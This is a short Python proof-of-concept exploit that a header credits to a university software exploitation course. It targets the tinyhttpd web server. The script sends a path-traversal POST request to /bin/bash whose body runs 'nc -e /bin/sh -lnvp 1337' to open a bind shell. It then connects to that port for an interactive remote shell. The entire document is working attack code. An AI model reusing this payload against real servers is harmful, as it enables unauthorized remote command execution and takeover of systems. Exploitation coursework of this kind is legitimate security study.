# BIND SHELL POC FOR TINYHTTPD EXPLOIT FALL 2019 JAROD KEENE
# SOFTWARE EXPLOITATION GRANT DAKOTA STATE UNIVERSITY
# THIS BIND SHELL EXPLOIT REQUIRES THE TARGET SYSTEM TO HAVE NETCAT WITH -e OPTION

#!/usr/bin/python2.7
import socket
import os
import sys
from time import sleep
from pwn import *

# CURRENT HOSTNAME tinyhttpd.host IS AN ENTRY IN MY HOSTS FILE
hostname = "tinyhttpd.host"
# STANDARD PORT 80 (COULD BE SUBJECT TO CHANGE IN DIFFERENT ENVIRONMENTS)
port = 80

# USE SOCKET LIBRARY TO GRAB AN IP FROM THE HOSTNAME
ip = socket.gethostbyname(hostname)
print("[*] CONNECTING TO TINYHTTPD WEBSERVER")

# PWNTOOLS METHOD (EASIER TO USE)
s = remote(hostname, port)

# SET THE COMMAND THAT CREATES THE BIND SHELL
com = "nc -e /bin/sh -lnvp 1337\n"

#BUILD OUT THE PAYLOAD, POST WITH BASH AS TARGET AND POST CONTENT AS COMMAND VARIABLE
payload = "POST /../../../../../../../bin/bash\nContent-Length: " + str(len(com)) + "\n\n"+ com +"\n"

# SEND THE PAYLOAD WE BUILT OUT 
print("[*] SENDING EXPLOIT PAYLOAD TO CREATE BIND SHELL")
s.send(payload)
# CLOSE THE WEB CONNECTION
s.close()
# SLEEP TO MAKE SURE THE COMMAND COMPLETES
sleep(0.1)

# NOW CREATE NEW REMOTE SESSION WITH THE BIND SHELL PORT
print("[*] CONNECTING TO BIND SHELL ON PORT 1337")
shell = remote(hostname, 1337)
# INTERACT WITH THAT CONNECTION (SHOULD BE A SHELL)
shell.interactive()